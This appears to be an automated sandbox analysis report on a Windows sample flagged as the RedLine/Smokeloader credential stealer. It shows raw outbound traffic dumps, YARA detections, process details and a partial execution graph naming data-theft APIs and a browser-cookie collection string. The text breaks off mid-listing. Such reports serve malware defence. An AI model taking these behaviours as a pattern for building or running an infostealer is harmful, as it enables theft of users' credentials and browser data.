                                                  2024-04-24 23:59:59 UTC15331OUTData Raw: 18 90 11 00 53 b7 97 3d 49 89 24 93 7c 69 0e 4e a2 56 79 74 a3 4a 74 cc 25 82 d1 9f 3c 25 0e 03 eb 8a 32 04 8e 54 fa 6d fb a4 6e a1 10 c6 42 63 96 1c 8a 47 8d c0 65 88 ff a2 4c d7 3a 83 91 b6 9c b5 08 75 89 34 19 d0 e4 15 df 9c c4 51 5a d7 62 9f d0 e3 e5 16 c3 cc 4d 59 02 8f da c7 e4 e6 12 84 1c d8 c3 f7 e8 d1 7e 51 15 4d d7 d5 ee 57 4c 5d ac 97 49 2e 33 31 37 27 36 6a 03 3e 35 7f ba 32 13 ae 7b 02 0b ca 15 40 d2 17 fc 84 44 6b 5c c1 37 79 fa 58 e9 cc b3 bf 97 cc 40 c3 a1 6a d3 22 68 b2 89 38 29 61 43 4a 09 96 24 91 02 16 af 98 61 7b c2 c7 95 5b 0b e9 31 a9 a2 c7 b3 32 9e 69 ec 62 26 e5 11 c5 d8 7f c5 1f f6 5d 1d 54 fb e1 4a 32 15 4b 96 62 ce 06 e9 e4 eb 54 58 6a 2a 5a c3 b6 2e c9 48 5f 98 ea a4 9d b0 76 a3 88 c1 02 1f 80 35 ac 33 2f e0 2a 1f 9b 1f 2a d9
                                                  Data Ascii: S=I$|iNVytJt%<%2TmnBcGeL:u4QZbMY~QMWL]I.317'6j>52{@Dk\7yX@j"h8)aCJ$a{[12ib&]TJ2KbTXj*Z.H_v53/**
                                                  2024-04-24 23:59:59 UTC15331OUTData Raw: c7 9e be dc 56 46 17 26 8d ae 99 b8 c5 de 0a be 9b eb 3f 0f cd e9 ca fa 67 0a 6d 94 af 35 3d 8d b2 74 ca 48 d8 42 80 eb 94 e6 28 13 b5 2c 23 11 42 7a c4 93 bd e5 65 a6 71 7a c3 35 32 21 07 54 ac 95 7f 81 b5 4e e5 3c 35 d4 18 06 7b a3 db e2 e5 89 d1 0b fa a5 5e d0 4f 5b cd a3 a6 8e 9f 71 5c 10 6e cf 7d 0d 49 5d fc d3 f1 c9 ea 96 2d 20 d8 86 44 86 ed 5c 98 ce a3 26 b6 13 67 79 ba b1 6f 85 29 91 20 cb 97 b5 fc 2c a9 43 af 96 26 49 9c 98 31 9b 92 19 ed 7b 16 76 f1 8e de 6d d6 c1 39 39 5a 44 f9 db e4 87 24 74 24 2a 76 47 c7 41 d6 f1 53 64 e8 a0 42 7c 19 cf fe 07 ae 89 b0 f1 79 2d b5 12 a5 5f a8 5f 81 be 73 d7 b0 b1 bd f6 d5 bb 3e 3c 04 b6 78 54 61 3f 5b 59 51 e7 29 d6 89 33 45 c7 f5 b4 26 a6 00 b8 3b 29 93 2d 93 39 8e 4b db ce 36 2a 53 01 5f 04 80 1e 08 dd 29
                                                  Data Ascii: VF&?gm5=tHB(,#Bzeqz52!TN<5{^O[q\n}I]- D\&gyo) ,C&I1{vm99ZD$t$*vGASdB|y-__s><xTa?[YQ)3E&;)-9K6*S_)
                                                  2024-04-24 23:59:59 UTC15331OUTData Raw: a3 5f d0 97 02 e6 f4 7c 46 41 86 1c dc f0 b4 1b 21 78 0c 11 19 38 35 33 66 72 63 08 b6 0e 0b cd 3e e2 99 e1 32 16 58 a1 78 a5 9e f1 e0 08 3a 74 2c 38 57 f1 0a 6b ce b7 44 63 3d 41 15 57 52 41 4c 58 4f e8 7b 5e cc 89 9d d3 a3 d0 5d 5a 0b 42 18 42 25 33 7d 76 7e e2 0f 16 5f df a3 73 f7 d4 ed fc 63 c1 38 7a 42 92 3e d3 6a 17 f0 ca c5 3e f4 c4 47 8a ec 08 a5 cb fe 83 9d df d9 56 cf a3 05 cd 4b 4a 2f f6 5b 62 d9 6f 06 66 26 9e 14 5e 5f 1b 4d 6e a6 e8 bf 25 27 60 86 18 27 a7 32 d1 31 c7 67 82 06 0c 31 9b e5 ba 6a dd 82 45 8f ae 03 ea 78 87 9b 57 a3 f6 30 05 c7 a2 0d ca 7d f2 f6 54 ea 55 26 93 8b 14 a8 4f ef 43 31 36 61 c2 58 8d c3 64 fa f1 e2 2d 69 76 c2 5e 1b da 09 f1 57 5a 32 91 08 55 c7 e0 77 d3 36 f3 7e cb a8 99 04 38 3b a1 0a f4 f1 77 48 1a 08 4e 8c ba 12
                                                  Data Ascii: _|FA!x853frc>2Xx:t,8WkDc=AWRALXO{^]ZBB%3}v~_sc8zB>j>GVKJ/[bof&^_Mn%'`'21g1jExW0}TU&OC16aXd-iv^WZ2Uw6~8;wHN
                                                  2024-04-24 23:59:59 UTC15331OUTData Raw: 91 97 af 40 3d f8 72 11 90 28 43 a3 52 cb d0 8e 6c 65 b5 ba d0 26 73 34 d5 d4 86 c7 e7 5b b1 eb dc 45 23 ee 96 77 5d 96 65 3c 3c 88 06 ec b7 f5 01 bf aa d4 a4 44 6b 12 70 8e 8c 8e a6 31 46 70 4c ff 82 51 d8 ac ae 79 08 e4 b2 3c 9f 8c 24 25 5a e1 ef f5 bd 73 8c eb 7e 19 05 13 e0 c3 94 88 f9 36 39 ad 22 2b 2e b2 33 c2 aa 97 85 9f 55 77 30 ee cc 3f 3e 30 c8 91 da be d3 50 60 b3 b2 ee b4 9b 71 b8 9f a7 5d c0 28 e4 d7 09 5c 3c d6 29 f6 c3 15 47 7a 4c 26 0e 9b b8 4a 83 ae 65 4d c1 23 3d 75 db f8 18 92 ae c8 67 5d 43 00 9f 16 01 06 87 45 ae b9 83 e6 6f ac ab 72 dc eb 05 fa 54 13 6c 2c c4 7f fe c4 2e 83 5a ec f7 e9 c1 76 b9 c4 00 6a 5d 71 f5 85 5b 0f 5e 8b 26 37 9d da 56 57 11 9d b1 b5 b7 16 f2 ac 75 11 f9 5d fa be a7 dc d3 d9 f1 c4 36 70 dc 84 f9 dc 5b f4 a1 37
                                                  Data Ascii: @=r(CRle&s4[E#w]e<<Dkp1FpLQy<$%Zs~69"+.3Uw0?>0P`q](\<)GzL&JeM#=ug]CEorTl,.Zvj]q[^&7VWu]6p[7
                                                  2024-04-24 23:59:59 UTC15331OUTData Raw: 25 68 ed ab 66 6f 65 e9 44 d4 ec 69 ae 85 07 ad eb 64 88 85 4e ca 87 bd 88 09 3b 64 e1 76 82 70 cc fb ad 6e 3e 1c 1a c8 ff bc 6c b1 78 9f 23 85 91 04 fe 73 2a 50 4e 19 ef aa 19 fd 85 b4 ae a1 3d a0 cc a0 2e 76 c9 e6 10 fd 5c 2b 21 bd bd 69 16 d8 70 a4 fe 9a e0 b1 33 11 9c 11 75 58 a6 d5 52 eb 51 cd 63 dc f0 56 25 38 10 3a f6 bf bf 35 a3 55 72 94 47 99 e7 51 7f 5d c5 a5 2c 14 67 70 f2 58 44 2f 6f e8 1b b7 28 19 5d 8f c5 e7 e4 01 5b c7 e8 3e 54 eb 3d c6 b4 50 83 84 6d 27 8a aa b8 68 98 ab 92 9a b4 b5 a0 85 34 3f 2e 4a d5 17 48 71 5f ff 4f ce 97 da 78 13 c2 0b 0b c5 9e b6 1d a9 7e fe 88 d8 ce 47 dc 5a 97 12 3d b9 1e f7 f0 41 19 9a 32 33 fb 58 b8 9e a0 a3 1d 3c 29 de b9 ee f9 f5 73 d3 6a d4 f3 67 ae 28 93 c2 5a 61 bc db 89 89 55 09 70 75 2f 7d cb ef d2 18 a6
                                                  Data Ascii: %hfoeDidN;dvpn>lx#s*PN=.v\+!ip3uXRQcV%8:5UrGQ],gpXD/o(][>T=Pm'h4?.JHq_Ox~GZ=A23X<)sjg(ZaUpu/}
                                                  2024-04-24 23:59:59 UTC15331OUTData Raw: 0c fd a5 54 5a da d3 ed 6e 35 4c 8a 3e 84 98 8f c6 4f 7b 92 40 de 7d 18 5a b1 55 34 65 da eb a0 d3 a8 69 a4 cf c7 62 84 c1 69 98 48 27 92 52 53 a8 03 88 f9 3b 36 40 41 7e 4f 86 0c 90 44 49 ae 9c 03 89 4b df 71 51 48 98 48 61 14 89 bc f7 34 76 7a d6 83 51 f6 70 1d 63 62 e0 26 25 d0 83 5f 7f 64 74 bd dd a9 a2 b7 c2 8a ff 6f 85 0a ff 9f 75 2e 91 61 a7 24 d8 68 bb d2 3e b8 e8 9a f9 7e a9 46 3f 24 04 42 a9 44 5c 13 5f 7d c8 7b ef 04 47 d9 48 2f 10 7b 40 9c 32 28 64 4c 8e ce 11 f9 8b 47 df 8d ac 2c 0d b8 f5 b8 94 66 01 a6 4a 28 97 43 d4 03 a2 a4 4e d7 a2 f5 8a f0 f5 a7 ae e5 f6 f3 7a 1a e5 c8 ca 70 75 0e 88 e9 0f ed 99 50 03 a2 fb 99 e1 10 a8 19 2b bb 03 58 f6 22 c8 82 31 04 86 2d 68 e6 b5 e3 c3 87 d9 2d 47 ac bd 40 af 18 66 76 b8 f6 c8 39 b0 f0 e5 2c e2 9b f3
                                                  Data Ascii: TZn5L>O{@}ZU4eibiH'RS;6@A~ODIKqQHHa4vzQpcb&%_dtou.a$h>~F?$BD\_}{GH/{@2(dLG,fJ(CNzpuP+X"1-h-G@fv9,
                                                  2024-04-25 00:00:01 UTC808INHTTP/1.1 200 OK
                                                  Date: Thu, 25 Apr 2024 00:00:01 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Set-Cookie: PHPSESSID=teuilkfbarphnvlg5kckkba48l; expires=Sun, 18-Aug-2024 17:46:40 GMT; Max-Age=9999999; path=/
                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                  Pragma: no-cache
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5f%2B53fdA3SA0wbo9IsGKwyNU3ij0LU2luKL5fC6VWgeltR0t5HZpbLc6XM6%2BVtnjKtWViSSvzDXeCNOk9ZFDyx%2BJrTEL5alWgId4XRGeHoWDFxLoX6N1xBwLR1nxGs97sK4h2DRj5A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 879a0cde9901b050-ATL
                                                  alt-svc: h3=":443"; ma=86400


                                                  Statistics

                                                  CPU Usage

                                                  Click to jump to process

                                                  Memory Usage

                                                  Click to jump to process

                                                  High Level Behavior Distribution

                                                  Click to dive into process behavior distribution

                                                  Behavior

                                                  Click to jump to process

                                                  System Behavior

                                                  General

                                                  Target ID:0
                                                  Start time:01:59:50
                                                  Start date:25/04/2024
                                                  Path:C:\Users\user\Desktop\o7b91j8vnJ.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\Desktop\o7b91j8vnJ.exe"
                                                  Imagebase:0x400000
                                                  File size:360'960 bytes
                                                  MD5 hash:7B3E62BCBEED62A180220669F6A0C548
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.1845056806.0000000004265000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.1844920776.00000000041D0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1845085815.00000000042CC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  Reputation:low
                                                  Has exited:true

                                                  General

                                                  Target ID:3
                                                  Start time:02:00:00
                                                  Start date:25/04/2024
                                                  Path:C:\Windows\SysWOW64\WerFault.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6856 -s 1516
                                                  Imagebase:0x880000
                                                  File size:483'680 bytes
                                                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Disassembly

                                                  Reset < >

                                                    Execution Graph

                                                    Execution Coverage:8.3%
                                                    Dynamic/Decrypted Code Coverage:8.2%
                                                    Signature Coverage:25.8%
                                                    Total number of Nodes:376
                                                    Total number of Limit Nodes:19
                                                    execution_graph 20261 414bc0 20262 433b50 RtlAllocateHeap 20261->20262 20263 414bcd 20262->20263 20264 439000 LdrInitializeThunk 20263->20264 20265 414bdd 20264->20265 20266 433b50 RtlAllocateHeap 20265->20266 20267 414bed 20266->20267 20268 439000 LdrInitializeThunk 20267->20268 20269 414bff 20268->20269 20028 419743 20033 433b50 20028->20033 20030 41975f 20036 439000 20030->20036 20034 433ba6 20033->20034 20035 433be4 RtlAllocateHeap 20033->20035 20034->20035 20035->20030 20038 43904d 20036->20038 20037 419795 20039 4390ae 20038->20039 20042 433cc0 20038->20042 20039->20037 20041 433cc0 LdrInitializeThunk 20039->20041 20041->20037 20043 433cf0 20042->20043 20044 433ced LdrInitializeThunk 20042->20044 20043->20039 20044->20039 20045 436041 20047 43609d 20045->20047 20046 4361aa LoadLibraryW 20046->20047 20047->20046 20047->20047 20048 414c49 20049 414c4f 20048->20049 20050 433cc0 LdrInitializeThunk 20049->20050 20051 415981 20050->20051 20052 414848 20054 41484e 20052->20054 20053 41490e 20054->20053 20055 433cc0 LdrInitializeThunk 20054->20055 20056 414936 20055->20056 20270 4357ca 20272 435810 20270->20272 20271 43586e 20274 433cc0 LdrInitializeThunk 20271->20274 20272->20271 20273 433cc0 LdrInitializeThunk 20272->20273 20273->20271 20274->20271 20057 41bf4a 20058 41bf4f 20057->20058 20061 438ba0 20058->20061 20060 41bfd6 20062 438bc0 20061->20062 20063 433b50 RtlAllocateHeap 20062->20063 20064 438be0 20063->20064 20064->20064 20065 438d0e 20064->20065 20066 433cc0 LdrInitializeThunk 20064->20066 20065->20060 20066->20065 20275 4375cd 20276 43760b 20275->20276 20277 43764a RtlReAllocateHeap 20275->20277 20276->20277 20278 437724 20277->20278 20067 4265436 20068 4265445 20067->20068 20071 4265bd6 20068->20071 20072 4265bf1 20071->20072 20073 4265bfa CreateToolhelp32Snapshot 20072->20073 20074 4265c16 Module32First 20072->20074 20073->20072 20073->20074 20075 4265c25 20074->20075 20076 426544e 20074->20076 20078 4265895 20075->20078 20079 42658c0 20078->20079 20080 42658d1 VirtualAlloc 20079->20080 20081 4265909 20079->20081 20080->20081 20081->20081 20082 414d51 20083 414d57 20082->20083 20084 433b50 RtlAllocateHeap 20083->20084 20085 414e72 20084->20085 20085->20085 20086 438ba0 2 API calls 20085->20086 20087 414eed 20086->20087 20279 42f4d3 20280 42f501 20279->20280 20281 433b50 RtlAllocateHeap 20280->20281 20282 42f5b1 20281->20282 20283 431dd5 20286 438070 20283->20286 20285 431e03 GetVolumeInformationW 20088 41d0005 20093 41d092b GetPEB 20088->20093 20090 41d0030 20094 41d003c 20090->20094 20093->20090 20095 41d0049 20094->20095 20109 41d0e0f SetErrorMode SetErrorMode 20095->20109 20100 41d0265 20101 41d02ce VirtualProtect 20100->20101 20103 41d030b 20101->20103 20102 41d0439 VirtualFree 20107 41d05f4 LoadLibraryA 20102->20107 20108 41d04be 20102->20108 20103->20102 20104 41d04e3 LoadLibraryA 20104->20108 20106 41d08c7 20107->20106 20108->20104 20108->20107 20110 41d0223 20109->20110 20111 41d0d90 20110->20111 20112 41d0dad 20111->20112 20113 41d0dbb GetPEB 20112->20113 20114 41d0238 VirtualAlloc 20112->20114 20113->20114 20114->20100 20115 422458 20116 422470 20115->20116 20116->20116 20117 433b50 RtlAllocateHeap 20116->20117 20118 42255d 20117->20118 20119 438ba0 2 API calls 20118->20119 20120 42260d 20119->20120 20121 437663 20122 4376e4 RtlAllocateHeap 20121->20122 20123 4376ab 20121->20123 20124 437724 20122->20124 20123->20122 20125 417160 20128 432010 20125->20128 20127 41716d 20129 438ba0 2 API calls 20128->20129 20130 43203d 20129->20130 20131 432390 20130->20131 20133 433b50 RtlAllocateHeap 20130->20133 20135 432244 20130->20135 20136 43211e 20130->20136 20131->20127 20138 432066 20133->20138 20135->20131 20135->20135 20139 433cc0 LdrInitializeThunk 20135->20139 20136->20131 20136->20135 20141 434160 LdrInitializeThunk 20136->20141 20142 434010 LdrInitializeThunk 20136->20142 20143 434250 LdrInitializeThunk 20136->20143 20138->20136 20140 433cc0 LdrInitializeThunk 20138->20140 20139->20135 20140->20136 20141->20136 20142->20136 20143->20136 20296 4359e2 20297 435a3c 20296->20297 20298 435a9e 20297->20298 20299 433cc0 LdrInitializeThunk 20297->20299 20299->20298 20144 418a66 20145 418a7b 20144->20145 20146 433b50 RtlAllocateHeap 20145->20146 20147 418c08 20146->20147 20148 438ba0 2 API calls 20147->20148 20149 418c6e 20148->20149 20300 4309e9 20301 4309ee 20300->20301 20302 433b50 RtlAllocateHeap 20301->20302 20303 4309fc 20302->20303 20304 439000 LdrInitializeThunk 20303->20304 20305 430a26 20304->20305 20306 41e5ec 20307 41e5fc 20306->20307 20310 439500 20307->20310 20309 41e618 20313 43954d 20310->20313 20311 4395ae 20312 433b50 RtlAllocateHeap 20311->20312 20317 43969e 20311->20317 20315 4395eb 20312->20315 20313->20311 20314 433cc0 LdrInitializeThunk 20313->20314 20314->20311 20316 433cc0 LdrInitializeThunk 20315->20316 20315->20317 20316->20317 20317->20309 20150 41e670 20153 4393a0 20150->20153 20155 4393c0 20153->20155 20154 41e685 20155->20154 20156 433cc0 LdrInitializeThunk 20155->20156 20156->20154 20318 41a0f0 20319 41a140 20318->20319 20320 41a0fe 20318->20320 20321 433b50 RtlAllocateHeap 20320->20321 20322 41a154 20321->20322 20324 41a200 20322->20324 20325 41a280 20324->20325 20326 433b50 RtlAllocateHeap 20325->20326 20328 41a300 20326->20328 20327 438d50 2 API calls 20329 41a371 20327->20329 20328->20327 20328->20328 20330 4139fc 20331 4097d0 2 API calls 20330->20331 20332 413a09 20331->20332 20333 4097d0 2 API calls 20332->20333 20334 413a1d 20333->20334 20335 408c80 20336 408c8a 20335->20336 20338 408caa GetStdHandle 20336->20338 20339 408c9d 20336->20339 20337 408cf2 ExitProcess 20338->20339 20339->20337 20157 41c900 20158 41c95f 20157->20158 20159 41c90b 20157->20159 20160 433b50 RtlAllocateHeap 20159->20160 20161 41c96e 20160->20161 20162 433b50 RtlAllocateHeap 20161->20162 20162->20158 20340 424087 20341 424091 20340->20341 20342 4244fe GetComputerNameExA 20341->20342 20344 42456d 20342->20344 20343 4245fb GetComputerNameExA 20345 42467b 20343->20345 20344->20343 20344->20344 20346 427f84 20347 428066 SysAllocString 20346->20347 20348 42801a 20346->20348 20349 4280cd 20347->20349 20348->20347 20350 415087 20352 415090 20350->20352 20351 41516e 20352->20351 20353 433cc0 LdrInitializeThunk 20352->20353 20353->20351 20163 413c09 20164 413c15 20163->20164 20167 4097d0 20164->20167 20166 413c23 20168 4097e5 20167->20168 20172 409821 20167->20172 20173 431cd0 20168->20173 20170 409895 20171 433b50 RtlAllocateHeap 20170->20171 20171->20172 20172->20166 20174 431d82 RtlExpandEnvironmentStrings 20173->20174 20175 431d41 20173->20175 20175->20174 20176 42d608 20177 42d60d 20176->20177 20178 42d6a4 KiUserCallbackDispatcher GetSystemMetrics 20177->20178 20179 436209 20181 43627c LoadLibraryW 20179->20181 20354 424f8f 20355 424f96 20354->20355 20356 431cd0 RtlExpandEnvironmentStrings 20355->20356 20357 42506a 20356->20357 20358 4250b5 GetPhysicallyInstalledSystemMemory 20357->20358 20359 4250da 20358->20359 20359->20359 20360 415890 20361 438d50 2 API calls 20360->20361 20362 415897 20361->20362 20363 438d50 2 API calls 20362->20363 20364 4158a1 20363->20364 20365 41c390 20366 41c395 20365->20366 20370 41fe80 20366->20370 20374 41c540 20366->20374 20367 41c3bf 20371 41fe99 20370->20371 20373 420000 20370->20373 20372 433b50 RtlAllocateHeap 20371->20372 20372->20373 20373->20367 20375 41c556 20374->20375 20386 41c610 20374->20386 20376 433b50 RtlAllocateHeap 20375->20376 20375->20386 20378 41c682 20376->20378 20377 438ba0 2 API calls 20379 41c6fd 20377->20379 20378->20377 20378->20378 20380 433b50 RtlAllocateHeap 20379->20380 20379->20386 20381 41c70d 20380->20381 20382 439000 LdrInitializeThunk 20381->20382 20383 41c71f 20382->20383 20384 433b50 RtlAllocateHeap 20383->20384 20385 41c765 20383->20385 20387 41c77a 20384->20387 20385->20386 20388 433cc0 LdrInitializeThunk 20385->20388 20386->20367 20387->20387 20390 408d90 RtlAllocateHeap 20387->20390 20388->20386 20390->20385 20182 433d10 20183 433d6c 20182->20183 20184 433cc0 LdrInitializeThunk 20183->20184 20185 433dce 20183->20185 20184->20185 20186 433f4e 20185->20186 20187 433cc0 LdrInitializeThunk 20185->20187 20187->20186 20391 431690 20392 438ba0 2 API calls 20391->20392 20393 4316c0 20392->20393 20398 415999 20399 4159a8 20398->20399 20400 433b50 RtlAllocateHeap 20399->20400 20402 415ad6 20400->20402 20401 415ce9 CryptUnprotectData 20402->20401 20188 435f1f 20190 435f2a 20188->20190 20189 436000 LoadLibraryW 20191 436007 20189->20191 20190->20189 20190->20190 20192 411d1c 20193 411d2b 20192->20193 20198 414950 20193->20198 20195 411d3e 20196 4097d0 RtlExpandEnvironmentStrings RtlAllocateHeap 20195->20196 20197 411d48 20196->20197 20199 414970 20198->20199 20199->20199 20200 41497a RtlExpandEnvironmentStrings 20199->20200 20201 4149ae 20200->20201 20202 433b50 RtlAllocateHeap 20201->20202 20203 4149be RtlExpandEnvironmentStrings 20202->20203 20204 414a4e 20203->20204 20205 433b50 RtlAllocateHeap 20204->20205 20206 414ad7 20205->20206 20206->20206 20207 438ba0 2 API calls 20206->20207 20208 414b5a 20207->20208 20403 4106a0 20404 4106af 20403->20404 20409 417810 20404->20409 20406 4106c0 20407 4097d0 RtlExpandEnvironmentStrings RtlAllocateHeap 20406->20407 20408 4106ca 20407->20408 20410 417830 20409->20410 20410->20410 20411 41783b RtlExpandEnvironmentStrings 20410->20411 20412 41785c 20411->20412 20413 433b50 RtlAllocateHeap 20412->20413 20414 41786b RtlExpandEnvironmentStrings 20413->20414 20415 438d50 2 API calls 20414->20415 20416 41788f 20415->20416 20417 4146a3 20418 433b50 RtlAllocateHeap 20417->20418 20419 4146ad 20418->20419 20420 439000 LdrInitializeThunk 20419->20420 20421 4146bf 20420->20421 20422 4162a2 20425 417280 20422->20425 20426 417340 20425->20426 20427 433b50 RtlAllocateHeap 20426->20427 20428 41743e 20427->20428 20429 433b50 RtlAllocateHeap 20428->20429 20430 41764c 20429->20430 20431 41f3a4 20432 4393a0 LdrInitializeThunk 20431->20432 20433 41f3c7 20432->20433 20434 4145b2 20435 4145c0 20434->20435 20436 438ba0 2 API calls 20435->20436 20437 4145fd 20436->20437 20209 41e434 20210 41e437 20209->20210 20211 41e3d0 20209->20211 20212 4393a0 LdrInitializeThunk 20211->20212 20213 41e416 20212->20213 20438 4204b7 20443 4204e9 20438->20443 20439 420510 20445 4205d2 20439->20445 20447 433cc0 LdrInitializeThunk 20439->20447 20440 439500 RtlAllocateHeap LdrInitializeThunk 20440->20443 20441 4207b5 20446 42089e 20441->20446 20448 433cc0 LdrInitializeThunk 20441->20448 20442 4393a0 LdrInitializeThunk 20442->20443 20443->20439 20443->20440 20443->20441 20443->20442 20443->20443 20443->20446 20450 420997 20443->20450 20451 439e50 20443->20451 20449 433cc0 LdrInitializeThunk 20446->20449 20447->20445 20448->20446 20449->20450 20453 439e70 20451->20453 20452 439f3e 20454 433b50 RtlAllocateHeap 20452->20454 20457 43a032 20452->20457 20453->20452 20455 433cc0 LdrInitializeThunk 20453->20455 20456 439f7d 20454->20456 20455->20452 20456->20457 20458 433cc0 LdrInitializeThunk 20456->20458 20457->20443 20458->20457 20214 413a3b 20215 413a4a 20214->20215 20240 41d690 20215->20240 20217 413a50 20218 4097d0 RtlExpandEnvironmentStrings RtlAllocateHeap 20217->20218 20219 413a5a 20218->20219 20220 41df50 6 API calls 20219->20220 20221 413a6c 20220->20221 20222 4097d0 RtlExpandEnvironmentStrings RtlAllocateHeap 20221->20222 20223 413a76 20222->20223 20224 4097d0 RtlExpandEnvironmentStrings RtlAllocateHeap 20223->20224 20225 413a95 20224->20225 20226 420220 LdrInitializeThunk 20225->20226 20227 413aaa 20226->20227 20228 420ca0 RtlAllocateHeap LdrInitializeThunk 20227->20228 20229 413ab3 20228->20229 20230 4097d0 RtlExpandEnvironmentStrings RtlAllocateHeap 20229->20230 20231 413ac6 20230->20231 20232 421eb0 RtlExpandEnvironmentStrings RtlExpandEnvironmentStrings RtlAllocateHeap 20231->20232 20233 413adb 20232->20233 20234 4097d0 RtlExpandEnvironmentStrings RtlAllocateHeap 20233->20234 20235 413ae5 20234->20235 20236 423410 RtlAllocateHeap 20235->20236 20237 413afa 20236->20237 20238 42c500 6 API calls 20237->20238 20239 413b03 20238->20239 20241 41d710 20240->20241 20242 41d746 RtlExpandEnvironmentStrings 20240->20242 20241->20241 20241->20242 20243 41d78b 20242->20243 20244 433b50 RtlAllocateHeap 20243->20244 20245 41d79b RtlExpandEnvironmentStrings 20244->20245 20246 41d829 20245->20246 20247 433b50 RtlAllocateHeap 20246->20247 20248 41d8c6 20247->20248 20251 438d50 20248->20251 20250 41d937 20252 438d70 20251->20252 20253 433b50 RtlAllocateHeap 20252->20253 20254 438d90 20253->20254 20255 438ebe 20254->20255 20256 433cc0 LdrInitializeThunk 20254->20256 20255->20250 20256->20255

                                                    Executed Functions

                                                    Function 0041CAEC Relevance: 16.9, APIs: 2, Strings: 7, Instructions: 1109COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000,?), ref: 0041D77D
                                                    • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,?,?), ref: 0041D7A8
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1843109267.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1843109267.0000000000449000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_o7b91j8vnJ.jbxd
                                                    Similarity
                                                    • API ID: EnvironmentExpandStrings
                                                    • String ID: -^$AV$SE$X&$[info] collected cookies file of the chromium-based browser$onqp$onqp
                                                    • API String ID: 237503144-3553015444
                                                    • Opcode ID: c3e7ce5279bbfde57a6df063cb837e0ba5410395dca0e577725f3cf45325333f
                                                    • Instruction ID: 03b20d697cc4d4ceda3fd1ee009f6e38ade5153744173ede794293296183730d
                                                    • Opcode Fuzzy Hash: c3e7ce5279bbfde57a6df063cb837e0ba5410395dca0e577725f3cf45325333f
                                                    • Instruction Fuzzy Hash: F4829A79608341CFE314CF18D89076BB7E2FB8A314F198A2DE4959B3A1D778D845CB86
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00423943 Relevance: 7.6, APIs: 2, Strings: 2, Instructions: 643COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 410 423943-424276 412 424281-424323 call 438070 410->412 413 424278-42427e call 408700 410->413 419 424325 412->419 420 424378-424381 412->420 413->412 421 424330-424376 419->421 422 424383-424389 420->422 423 42439b-4243a7 420->423 421->420 421->421 424 424390-424399 422->424 425 4243bb-4243e9 call 408770 call 438070 423->425 426 4243a9-4243af 423->426 424->423 424->424 431 4243ee-4243f8 425->431 428 4243b0-4243b9 426->428 428->425 428->428 432 4243fb-42445d 431->432 433 4244a8-4244b1 432->433 434 42445f 432->434 436 4244b3-4244b9 433->436 437 4244cb-4244d7 433->437 435 424460-4244a6 434->435 435->433 435->435 438 4244c0-4244c9 436->438 439 4244eb-4244f9 call 438070 437->439 440 4244d9-4244df 437->440 438->437 438->438 443 4244fe-42456b GetComputerNameExA 439->443 442 4244e0-4244e9 440->442 442->439 442->442 444 4245b2-4245bb 443->444 445 42456d-42456f 443->445 447 4245db-4245e7 444->447 448 4245bd-4245c3 444->448 446 424570-4245b0 445->446 446->444 446->446 450 4245fb-424679 GetComputerNameExA 447->450 451 4245e9-4245ef 447->451 449 4245d0-4245d9 448->449 449->447 449->449 453 4246d2-4246db 450->453 454 42467b 450->454 452 4245f0-4245f9 451->452 452->450 452->452 456 4246fb-424707 453->456 457 4246dd-4246e3 453->457 455 424680-4246d0 454->455 455->453 455->455 458 42471b-424780 456->458 459 424709-42470f 456->459 460 4246f0-4246f9 457->460 463 424782 458->463 464 4247c0-4247c9 458->464 461 424710-424719 459->461 460->456 460->460 461->458 461->461 465 424790-4247be 463->465 466 4247eb-4247f7 464->466 467 4247cb-4247d1 464->467 465->464 465->465 469 42480b-42488a call 438070 466->469 470 4247f9-4247ff 466->470 468 4247e0-4247e9 467->468 468->466 468->468 475 4248e9-4248f2 469->475 476 42488c-42488f 469->476 471 424800-424809 470->471 471->469 471->471 478 4248f4-424902 475->478 479 42491d-42491f 475->479 477 424890-4248e7 476->477 477->475 477->477 480 424910-424919 478->480 481 424925-424933 479->481 480->480 482 42491b 480->482 483 424958-424961 481->483 482->481 484 424a01-424a04 483->484 485 424967-42496d 483->485 486 424a0a-424a50 484->486 487 424940-424942 485->487 488 42496f-424999 485->488 492 424a52 486->492 493 424aa5-424ab0 486->493 489 424947-424952 487->489 490 4249c0-4249ce 488->490 491 42499b-42499e 488->491 489->483 497 424a06-424a08 489->497 490->489 498 4249d4-4249fc 490->498 491->490 499 4249a0-4249be 491->499 494 424a60-424aa3 492->494 495 